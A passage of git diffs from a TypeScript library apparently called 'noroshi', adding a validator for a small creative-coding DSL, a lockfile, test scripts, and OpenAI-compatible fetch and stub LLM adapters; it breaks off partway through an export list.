+      case "rotate":
+      case "translate":
+      case "circle":
+      case "square":
+      case "rect":
+      case "line": {
+        const n = ARITY[t.value]!;
+        for (let k = 0; k < n; k++) {
+          const r = this.expr();
+          if (!r.ok) return r;
+        }
+        return { ok: true };
+      }
+      case "repeat": {
+        const count = this.eat();
+        if (!count || count.kind !== "num" || !/^\d+$/.test(count.value)) {
+          return { ok: false, error: `repeat expects a positive integer at offset ${count?.pos ?? -1}` };
+        }
+        return this.braceBlock();
+      }
+      case "setup":
+      case "tick":
+        return { ok: false, error: `"${t.value}" block is only valid at the top level` };
+    }
+    return { ok: false, error: `unhandled keyword "${t.value}"` };
+  }
+
+  color(): ValidationResult {
+    const t = this.peek();
+    if (!t) return { ok: false, error: "expected color" };
+    if (t.kind === "color") { this.eat(); return { ok: true }; }
+    if (t.kind === "kw" && t.value === "rgb") {
+      this.eat();
+      const lp = this.eat();
+      if (!lp || lp.kind !== "lparen") return { ok: false, error: `rgb expects "(" at offset ${lp?.pos ?? -1}` };
+      for (let k = 0; k < 3; k++) {
+        const r = this.expr();
+        if (!r.ok) return r;
+        if (k < 2) {
+          const c = this.eat();
+          if (!c || c.kind !== "comma") return { ok: false, error: `rgb expects "," at offset ${c?.pos ?? -1}` };
+        }
+      }
+      const rp = this.eat();
+      if (!rp || rp.kind !== "rparen") return { ok: false, error: `rgb expects ")" at offset ${rp?.pos ?? -1}` };
+      return { ok: true };
+    }
+    return { ok: false, error: `expected color name or rgb(...) at offset ${t.pos}, got "${t.value}"` };
+  }
+
+  /** expr → term (("+"|"-") term)* */
+  expr(): ValidationResult {
+    const r = this.term();
+    if (!r.ok) return r;
+    while (this.peek()?.kind === "op" && (this.peek()!.value === "+" || this.peek()!.value === "-")) {
+      this.eat();
+      const r2 = this.term();
+      if (!r2.ok) return r2;
+    }
+    return { ok: true };
+  }
+
+  /** term → factor (("*"|"/") factor)* */
+  term(): ValidationResult {
+    const r = this.factor();
+    if (!r.ok) return r;
+    while (this.peek()?.kind === "op" && (this.peek()!.value === "*" || this.peek()!.value === "/")) {
+      this.eat();
+      const r2 = this.factor();
+      if (!r2.ok) return r2;
+    }
+    return { ok: true };
+  }
+
+  factor(): ValidationResult {
+    const t = this.eat();
+    if (!t) return { ok: false, error: "expected expression, got end of input" };
+    if (t.kind === "num" || t.kind === "var") return { ok: true };
+    if (t.kind === "lparen") {
+      const r = this.expr();
+      if (!r.ok) return r;
+      const rp = this.eat();
+      if (!rp || rp.kind !== "rparen") return { ok: false, error: `expected ")" at offset ${rp?.pos ?? -1}` };
+      return { ok: true };
+    }
+    if (t.kind === "func") {
+      const lp = this.eat();
+      if (!lp || lp.kind !== "lparen") return { ok: false, error: `${t.value} expects "(" at offset ${lp?.pos ?? -1}` };
+      // at least one arg
+      const r = this.expr();
+      if (!r.ok) return r;
+      while (this.peek()?.kind === "comma") {
+        this.eat();
+        const rk = this.expr();
+        if (!rk.ok) return rk;
+      }
+      const rp = this.eat();
+      if (!rp || rp.kind !== "rparen") return { ok: false, error: `${t.value} expects ")" at offset ${rp?.pos ?? -1}` };
+      return { ok: true };
+    }
+    return { ok: false, error: `expected number, variable, function call, or "(...)" at offset ${t.pos}, got "${t.value}"` };
+  }
+}
+
+export class CreativeCodingValidator implements Validator {
+  readonly id = "creative-coding-v0";
+
+  validate(src: string): ValidationResult {
+    const toks = lex(src);
+    if (!Array.isArray(toks)) return { ok: false, error: toks.error };
+    return new Parser(toks).parse();
+  }
+}

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,0 +1,567 @@
+{
+  "name": "noroshi",
+  "version": "0.0.0-pre.2",
+  "lockfileVersion": 3,
+  "requires": true,
+  "packages": {
+    "": {
+      "name": "noroshi",
+      "version": "0.0.0-pre.2",
+      "license": "MIT",
+      "devDependencies": {
+        "@types/node": "^25.6.0",
+        "tsx": "^4.22.1",
+        "typescript": "^5.6.0"
+      }
+    },
+    "node_modules/@esbuild/aix-ppc64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.28.0.tgz",
+      "integrity": "sha512-lhRUCeuOyJQURhTxl4WkpFTjIsbDayJHih5kZC1giwE+MhIzAb7mEsQMqMf18rHLsrb5qI1tafG20mLxEWcWlA==",
+      "cpu": [
+        "ppc64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "aix"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/android-arm": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.28.0.tgz",
+      "integrity": "sha512-wqh0ByljabXLKHeWXYLqoJ5jKC4XBaw6Hk08OfMrCRd2nP2ZQ5eleDZC41XHyCNgktBGYMbqnrJKq/K/lzPMSQ==",
+      "cpu": [
+        "arm"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "android"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/android-arm64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.28.0.tgz",
+      "integrity": "sha512-+WzIXQOSaGs33tLEgYPYe/yQHf0WTU0X42Jca3y8NWMbUVhp7rUnw+vAsRC/QiDrdD31IszMrZy+qwPOPjd+rw==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "android"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/android-x64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.28.0.tgz",
+      "integrity": "sha512-+VJggoaKhk2VNNqVL7f6S189UzShHC/mR9EE8rDdSkdpN0KflSwWY/gWjDrNxxisg8Fp1ZCD9jLMo4m0OUfeUA==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "android"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/darwin-arm64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.28.0.tgz",
+      "integrity": "sha512-0T+A9WZm+bZ84nZBtk1ckYsOvyA3x7e2Acj1KdVfV4/2tdG4fzUp91YHx+GArWLtwqp77pBXVCPn2We7Letr0Q==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "darwin"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/darwin-x64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.28.0.tgz",
+      "integrity": "sha512-fyzLm/DLDl/84OCfp2f/XQ4flmORsjU7VKt8HLjvIXChJoFFOIL6pLJPH4Yhd1n1gGFF9mPwtlN5Wf82DZs+LQ==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "darwin"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/freebsd-arm64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.28.0.tgz",
+      "integrity": "sha512-l9GeW5UZBT9k9brBYI+0WDffcRxgHQD8ShN2Ur4xWq/NFzUKm3k5lsH4PdaRgb2w7mI9u61nr2gI2mLI27Nh3Q==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "freebsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/freebsd-x64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.28.0.tgz",
+      "integrity": "sha512-BXoQai/A0wPO6Es3yFJ7APCiKGc1tdAEOgeTNy3SsB491S3aHn4S4r3e976eUnPdU+NbdtmBuLncYir2tMU9Nw==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "freebsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-arm": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.28.0.tgz",
+      "integrity": "sha512-CjaaREJagqJp7iTaNQjjidaNbCKYcd4IDkzbwwxtSvjI7NZm79qiHc8HqciMddQ6CKvJT6aBd8lO9kN/ZudLlw==",
+      "cpu": [
+        "arm"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-arm64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.28.0.tgz",
+      "integrity": "sha512-RVyzfb3FWsGA55n6WY0MEIEPURL1FcbhFE6BffZEMEekfCzCIMtB5yyDcFnVbTnwk+CLAgTujmV/Lgvih56W+A==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-ia32": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.28.0.tgz",
+      "integrity": "sha512-KBnSTt1kxl9x70q+ydterVdl+Cn0H18ngRMRCEQfrbqdUuntQQ0LoMZv47uB97NljZFzY6HcfqEZ2SAyIUTQBQ==",
+      "cpu": [
+        "ia32"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-loong64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.28.0.tgz",
+      "integrity": "sha512-zpSlUce1mnxzgBADvxKXX5sl8aYQHo2ezvMNI8I0lbblJtp8V4odlm3Yzlj7gPyt3T8ReksE6bK+pT3WD+aJRg==",
+      "cpu": [
+        "loong64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-mips64el": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.28.0.tgz",
+      "integrity": "sha512-2jIfP6mmjkdmeTlsX/9vmdmhBmKADrWqN7zcdtHIeNSCH1SqIoNI63cYsjQR8J+wGa4Y5izRcSHSm8K3QWmk3w==",
+      "cpu": [
+        "mips64el"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-ppc64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.28.0.tgz",
+      "integrity": "sha512-bc0FE9wWeC0WBm49IQMPSPILRocGTQt3j5KPCA8os6VprfuJ7KD+5PzESSrJ6GmPIPJK965ZJHTUlSA6GNYEhg==",
+      "cpu": [
+        "ppc64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-riscv64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.28.0.tgz",
+      "integrity": "sha512-SQPZOwoTTT/HXFXQJG/vBX8sOFagGqvZyXcgLA3NhIqcBv1BJU1d46c0rGcrij2B56Z2rNiSLaZOYW5cUk7yLQ==",
+      "cpu": [
+        "riscv64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-s390x": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.28.0.tgz",
+      "integrity": "sha512-SCfR0HN8CEEjnYnySJTd2cw0k9OHB/YFzt5zgJEwa+wL/T/raGWYMBqwDNAC6dqFKmJYZoQBRfHjgwLHGSrn3Q==",
+      "cpu": [
+        "s390x"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/linux-x64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.28.0.tgz",
+      "integrity": "sha512-us0dSb9iFxIi8srnpl931Nvs65it/Jd2a2K3qs7fz2WfGPHqzfzZTfec7oxZJRNPXPnNYZtanmRc4AL/JwVzHQ==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "linux"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/netbsd-arm64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.28.0.tgz",
+      "integrity": "sha512-CR/RYotgtCKwtftMwJlUU7xCVNg3lMYZ0RzTmAHSfLCXw3NtZtNpswLEj/Kkf6kEL3Gw+BpOekRX0BYCtklhUw==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "netbsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/netbsd-x64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.28.0.tgz",
+      "integrity": "sha512-nU1yhmYutL+fQ71Kxnhg8uEOdC0pwEW9entHykTgEbna2pw2dkbFSMeqjjyHZoCmt8SBkOSvV+yNmm94aUrrqw==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "netbsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/openbsd-arm64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.28.0.tgz",
+      "integrity": "sha512-cXb5vApOsRsxsEl4mcZ1XY3D4DzcoMxR/nnc4IyqYs0rTI8ZKmW6kyyg+11Z8yvgMfAEldKzP7AdP64HnSC/6g==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "openbsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/openbsd-x64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.28.0.tgz",
+      "integrity": "sha512-8wZM2qqtv9UP3mzy7HiGYNH/zjTA355mpeuA+859TyR+e+Tc08IHYpLJuMsfpDJwoLo1ikIJI8jC3GFjnRClzA==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "openbsd"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/openharmony-arm64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/openharmony-arm64/-/openharmony-arm64-0.28.0.tgz",
+      "integrity": "sha512-FLGfyizszcef5C3YtoyQDACyg95+dndv79i2EekILBofh5wpCa1KuBqOWKrEHZg3zrL3t5ouE5jgr94vA+Wb2w==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "openharmony"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/sunos-x64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.28.0.tgz",
+      "integrity": "sha512-1ZgjUoEdHZZl/YlV76TSCz9Hqj9h9YmMGAgAPYd+q4SicWNX3G5GCyx9uhQWSLcbvPW8Ni7lj4gDa1T40akdlw==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "sunos"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/win32-arm64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.28.0.tgz",
+      "integrity": "sha512-Q9StnDmQ/enxnpxCCLSg0oo4+34B9TdXpuyPeTedN/6+iXBJ4J+zwfQI28u/Jl40nOYAxGoNi7mFP40RUtkmUA==",
+      "cpu": [
+        "arm64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/win32-ia32": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.28.0.tgz",
+      "integrity": "sha512-zF3ag/gfiCe6U2iczcRzSYJKH1DCI+ByzSENHlM2FcDbEeo5Zd2C86Aq0tKUYAJJ1obRP84ymxIAksZUcdztHA==",
+      "cpu": [
+        "ia32"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@esbuild/win32-x64": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.28.0.tgz",
+      "integrity": "sha512-pEl1bO9mfAmIC+tW5btTmrKaujg3zGtUmWNdCw/xs70FBjwAL3o9OEKNHvNmnyylD6ubxUERiEhdsL0xBQ9efw==",
+      "cpu": [
+        "x64"
+      ],
+      "dev": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "win32"
+      ],
+      "engines": {
+        "node": ">=18"
+      }
+    },
+    "node_modules/@types/node": {
+      "version": "25.6.0",
+      "resolved": "https://registry.npmjs.org/@types/node/-/node-25.6.0.tgz",
+      "integrity": "sha512-+qIYRKdNYJwY3vRCZMdJbPLJAtGjQBudzZzdzwQYkEPQd+PJGixUL5QfvCLDaULoLv+RhT3LDkwEfKaAkgSmNQ==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "undici-types": "~7.19.0"
+      }
+    },
+    "node_modules/esbuild": {
+      "version": "0.28.0",
+      "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.28.0.tgz",
+      "integrity": "sha512-sNR9MHpXSUV/XB4zmsFKN+QgVG82Cc7+/aaxJ8Adi8hyOac+EXptIp45QBPaVyX3N70664wRbTcLTOemCAnyqw==",
+      "dev": true,
+      "hasInstallScript": true,
+      "license": "MIT",
+      "bin": {
+        "esbuild": "bin/esbuild"
+      },
+      "engines": {
+        "node": ">=18"
+      },
+      "optionalDependencies": {
+        "@esbuild/aix-ppc64": "0.28.0",
+        "@esbuild/android-arm": "0.28.0",
+        "@esbuild/android-arm64": "0.28.0",
+        "@esbuild/android-x64": "0.28.0",
+        "@esbuild/darwin-arm64": "0.28.0",
+        "@esbuild/darwin-x64": "0.28.0",
+        "@esbuild/freebsd-arm64": "0.28.0",
+        "@esbuild/freebsd-x64": "0.28.0",
+        "@esbuild/linux-arm": "0.28.0",
+        "@esbuild/linux-arm64": "0.28.0",
+        "@esbuild/linux-ia32": "0.28.0",
+        "@esbuild/linux-loong64": "0.28.0",
+        "@esbuild/linux-mips64el": "0.28.0",
+        "@esbuild/linux-ppc64": "0.28.0",
+        "@esbuild/linux-riscv64": "0.28.0",
+        "@esbuild/linux-s390x": "0.28.0",
+        "@esbuild/linux-x64": "0.28.0",
+        "@esbuild/netbsd-arm64": "0.28.0",
+        "@esbuild/netbsd-x64": "0.28.0",
+        "@esbuild/openbsd-arm64": "0.28.0",
+        "@esbuild/openbsd-x64": "0.28.0",
+        "@esbuild/openharmony-arm64": "0.28.0",
+        "@esbuild/sunos-x64": "0.28.0",
+        "@esbuild/win32-arm64": "0.28.0",
+        "@esbuild/win32-ia32": "0.28.0",
+        "@esbuild/win32-x64": "0.28.0"
+      }
+    },
+    "node_modules/fsevents": {
+      "version": "2.3.3",
+      "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz",
+      "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==",
+      "dev": true,
+      "hasInstallScript": true,
+      "license": "MIT",
+      "optional": true,
+      "os": [
+        "darwin"
+      ],
+      "engines": {
+        "node": "^8.16.0 || ^10.6.0 || >=11.0.0"
+      }
+    },
+    "node_modules/tsx": {
+      "version": "4.22.1",
+      "resolved": "https://registry.npmjs.org/tsx/-/tsx-4.22.1.tgz",
+      "integrity": "sha512-TvncJykhxAzFCk0VQZKBTClall4Pm7qXDSodb6uxi8QFa8X8mT6ABjxxsQ2opDRYxG7AzcRWXaFtruz5HJKuWg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "esbuild": "~0.28.0"
+      },
+      "bin": {
+        "tsx": "dist/cli.mjs"
+      },
+      "engines": {
+        "node": ">=18.0.0"
+      },
+      "optionalDependencies": {
+        "fsevents": "~2.3.3"
+      }
+    },
+    "node_modules/typescript": {
+      "version": "5.9.3",
+      "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.9.3.tgz",
+      "integrity": "sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw==",
+      "dev": true,
+      "license": "Apache-2.0",
+      "bin": {
+        "tsc": "bin/tsc",
+        "tsserver": "bin/tsserver"
+      },
+      "engines": {
+        "node": ">=14.17"
+      }
+    },
+    "node_modules/undici-types": {
+      "version": "7.19.2",
+      "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-7.19.2.tgz",
+      "integrity": "sha512-qYVnV5OEm2AW8cJMCpdV20CDyaN3g0AjDlOGf1OW4iaDEx8MwdtChUp4zu4H0VP3nDRF/8RKWH+IPp9uW0YGZg==",
+      "dev": true,
+      "license": "MIT"
+    }
+  }
+}

--- a/package.json
+++ b/package.json
@@ -19,7 +19,7 @@
   "scripts": {
     "build": "tsc",
     "typecheck": "tsc --noEmit",
-    "test": "echo \"no tests yet\" && exit 0"
+    "test": "tsx examples/creative-coding-p5js/test.ts && tsx examples/creative-coding-p5js/test-fetch.ts && tsx examples/creative-coding-p5js/test-safety.ts"
   },
   "keywords": [
     "llm",

--- a/package.json
+++ b/package.json
@@ -44,6 +44,8 @@
   },
   "homepage": "https://github.com/velocitylabo/noroshi#readme",
   "devDependencies": {
+    "@types/node": "^25.6.0",
+    "tsx": "^4.22.1",
     "typescript": "^5.6.0"
   },
   "publishConfig": {

--- a/src/adapters/fetch.ts
+++ b/src/adapters/fetch.ts
@@ -1,4 +1,5 @@
 import type { LLMAdapter, LLMSampleOptions } from "../types.js";
+import { cleanCompletion } from "../util/clean.js";
 
 /**
  * Options for {@link FetchAdapter}.
@@ -29,6 +30,13 @@ export interface FetchAdapterOptions {
 
   /** Extra request headers. */
   headers?: Record<string, string>;
+
+  /**
+   * Disable the default LLM-noise cleanup applied to completion content
+   * (code fences, echoed prompt frame, hallucinated next few-shot turn).
+   * Set to `true` if your endpoint already returns a clean DSL string.
+   */
+  rawCompletion?: boolean;
 }
 
 interface ChatCompletionResponse {
@@ -50,6 +58,7 @@ export class FetchAdapter implements LLMAdapter {
   private readonly apiKey?: string;
   private readonly fetchImpl: typeof fetch;
   private readonly extraHeaders: Record<string, string>;
+  private readonly cleanup: (s: string) => string;
 
   constructor(opts: FetchAdapterOptions) {
     this.endpoint = opts.endpoint.replace(/\/+$/, "");
@@ -58,6 +67,7 @@ export class FetchAdapter implements LLMAdapter {
     this.id = opts.id ?? `fetch:${opts.model}`;
     this.fetchImpl = opts.fetch ?? fetch;
     this.extraHeaders = opts.headers ?? {};
+    this.cleanup = opts.rawCompletion ? (s) => s : cleanCompletion;
   }
 
   async complete(prompt: string, opts: LLMSampleOptions = {}): Promise<string> {
@@ -96,6 +106,6 @@ export class FetchAdapter implements LLMAdapter {
         `FetchAdapter ${url} unexpected response: ${JSON.stringify(json).slice(0, 500)}`,
       );
     }
-    return content;
+    return this.cleanup(content);
   }
 }

--- a/src/adapters/fetch.ts
+++ b/src/adapters/fetch.ts
@@ -1,0 +1,101 @@
+import type { LLMAdapter, LLMSampleOptions } from "../types.js";
+
+/**
+ * Options for {@link FetchAdapter}.
+ *
+ * Works with any OpenAI-compatible `/chat/completions` endpoint, including
+ * Ollama (`http://localhost:11434/v1`), llama.cpp `llama-server`, vLLM, LM
+ * Studio, OpenAI, OpenRouter. For non-OpenAI providers (Anthropic, Gemini)
+ * use a translating proxy or write a dedicated adapter.
+ */
+export interface FetchAdapterOptions {
+  /**
+   * Base URL up to and including the `/v1` segment. `/chat/completions` is
+   * appended automatically. Trailing slashes are stripped.
+   */
+  endpoint: string;
+
+  /** Model identifier as recognized by the server (e.g. `gemma4:e2b`). */
+  model: string;
+
+  /** Optional bearer token. Omit for unauthenticated local servers. */
+  apiKey?: string;
+
+  /** Override the adapter id (defaults to `fetch:<model>`). */
+  id?: string;
+
+  /** Inject a custom fetch (e.g. for tests). Defaults to global `fetch`. */
+  fetch?: typeof fetch;
+
+  /** Extra request headers. */
+  headers?: Record<string, string>;
+}
+
+interface ChatCompletionResponse {
+  choices?: Array<{ message?: { content?: string } }>;
+}
+
+/**
+ * LLM adapter that talks OpenAI-compatible chat completions over HTTP.
+ *
+ * The current scope is single-completion only. Native `n` sampling (when
+ * the server supports it) is not used — noroshi's `_sample` falls back to N
+ * parallel `complete` calls. If a provider's `n > 1` ever becomes the
+ * bottleneck, override `sampleN` here.
+ */
+export class FetchAdapter implements LLMAdapter {
+  readonly id: string;
+  private readonly endpoint: string;
+  private readonly model: string;
+  private readonly apiKey?: string;
+  private readonly fetchImpl: typeof fetch;
+  private readonly extraHeaders: Record<string, string>;
+
+  constructor(opts: FetchAdapterOptions) {
+    this.endpoint = opts.endpoint.replace(/\/+$/, "");
+    this.model = opts.model;
+    this.apiKey = opts.apiKey;
+    this.id = opts.id ?? `fetch:${opts.model}`;
+    this.fetchImpl = opts.fetch ?? fetch;
+    this.extraHeaders = opts.headers ?? {};
+  }
+
+  async complete(prompt: string, opts: LLMSampleOptions = {}): Promise<string> {
+    const url = `${this.endpoint}/chat/completions`;
+    const body = {
+      model: this.model,
+      messages: [{ role: "user", content: prompt }],
+      temperature: opts.temperature ?? 0.2,
+      top_p: opts.topP ?? 0.95,
+      max_tokens: opts.maxTokens ?? 256,
+      stop: opts.stop,
+      stream: false,
+    };
+
+    const headers: Record<string, string> = {
+      "content-type": "application/json",
+      ...this.extraHeaders,
+    };
+    if (this.apiKey) headers.authorization = `Bearer ${this.apiKey}`;
+
+    const res = await this.fetchImpl(url, {
+      method: "POST",
+      headers,
+      body: JSON.stringify(body),
+    });
+    if (!res.ok) {
+      const text = await res.text().catch(() => "");
+      throw new Error(
+        `FetchAdapter ${url} returned ${res.status}: ${text.slice(0, 500)}`,
+      );
+    }
+    const json = (await res.json()) as ChatCompletionResponse;
+    const content = json?.choices?.[0]?.message?.content;
+    if (typeof content !== "string") {
+      throw new Error(
+        `FetchAdapter ${url} unexpected response: ${JSON.stringify(json).slice(0, 500)}`,
+      );
+    }
+    return content;
+  }
+}

--- a/src/adapters/stub.ts
+++ b/src/adapters/stub.ts
@@ -1,0 +1,26 @@
+import type { LLMAdapter, LLMSampleOptions } from "../types.js";
+
+/**
+ * Echo / canned adapter for tests and offline development.
+ *
+ * Construct with a `responder` callback that maps prompt → output. Useful for
+ * exercising the noroshi pipeline (prompt build → validate → retry) without
+ * a real LLM. Real adapters (WebLLM, transformers.js, LiteRT-LM, fetch-based
+ * OpenAI/Anthropic) follow the same {@link LLMAdapter} contract.
+ */
+export class StubAdapter implements LLMAdapter {
+  readonly id = "stub";
+
+  constructor(private readonly responder: (prompt: string) => string | string[]) {}
+
+  async complete(prompt: string, _opts?: LLMSampleOptions): Promise<string> {
+    const r = this.responder(prompt);
+    return Array.isArray(r) ? r[0] ?? "" : r;
+  }
+
+  async sampleN(prompt: string, n: number, _opts?: LLMSampleOptions): Promise<string[]> {
+    const r = this.responder(prompt);
+    if (Array.isArray(r)) return r.slice(0, n);
+    return Array.from({ length: n }, () => r);
+  }
+}

--- a/src/index.ts
+++ b/src/index.ts
@@ -18,3 +18,5 @@ export type { PromptInputs } from "./prompt.js";
 export { generate } from "./noroshi.js";
 
 export { StubAdapter } from "./adapters/stub.js";
+export { FetchAdapter } from "./adapters/fetch.js";
+export type { FetchAdapterOptions } from "./adapters/fetch.js";

--- a/src/index.ts
+++ b/src/index.ts
@@ -1,1 +1,20 @@
 export const VERSION = "0.0.0-pre";
+
+export type {
+  FewShotExample,
+  GenerateOptions,
+  GenerateResult,
+  LLMAdapter,
+  LLMSampleOptions,
+  Ranker,
+  RetryOptions,
